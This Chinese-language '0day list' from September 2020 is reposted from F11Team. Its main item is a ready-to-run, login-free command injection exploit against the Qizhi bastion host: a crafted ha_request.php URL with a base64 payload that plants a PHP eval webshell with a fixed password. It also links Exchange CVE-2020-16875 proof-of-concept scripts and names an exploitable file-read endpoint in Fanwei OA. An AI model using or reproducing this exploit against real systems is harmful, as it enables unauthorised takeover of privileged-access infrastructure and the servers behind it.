截止到2020年9月12日:0day清单
转自F11Team
齐治堡垒机前台远程命令执行漏洞
漏洞利用:
利用条件:无需登录:
第一
http://10.20.10.11/listener/cluster_manage.php 返回“OK”。
第二,执行以下链接即可 getshell,执行成功后,生成 PHP 一句话马
/var/www/shterm/resources/qrcode/lbj77.php 密码 10086,使用 BASE64 进行编码。这里假设 10.20.10.10 为堡垒机的 IP 地址。
https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${I
FS}|`echo${IFS}"ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz
4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64
${IFS}-d|bash`|${IFS}|echo${IFS}
特征:
漏洞利用点:
https://10.20.10.10/ha_request.php
Poc 形式:
${IFS}|`echo${IFS}"ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7
Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base
64${IFS}-d|bash`|${IFS}|echo${IFS}
泛微OA云桥任意文件读取漏洞
利用/wxjsapi/saveYZJFile接口获取filepath,返回数据包内出现了程序的绝对路径,攻击者可以通过返回内容识别程序运行路径从而下载数据库配置文件危害可见。
多款Huawei产品越界读取漏洞
参考链接:https://www.cnvd.org.cn/flaw/show/CNVD-2020-36735
Exchange Server 远程代码执行漏洞(POC未验证)
CVE-2020-16875: Exchange Server 远程代码执行漏洞(202009月度漏洞)
ps 版POC:https://srcincite.io/pocs/cve-2020-16875.ps1.txt
py 版POC:https://srcincite.io/pocs/cve-2020-16875.py.txt
网传:山石SG-6000设备存在漏洞
官方辟谣称 该公告并不是指设备本身存在漏洞,而是某个使用山石网科网络安全设备的管理员安全意识不足,配置不当导致,实属于事件型安全漏洞。
参考链接:https://mp.weixin.qq.com/s/lg2ttFSIybginh6KNS-SGQ
禁止非法,后果自负
欢迎关注公众号:web安全工具库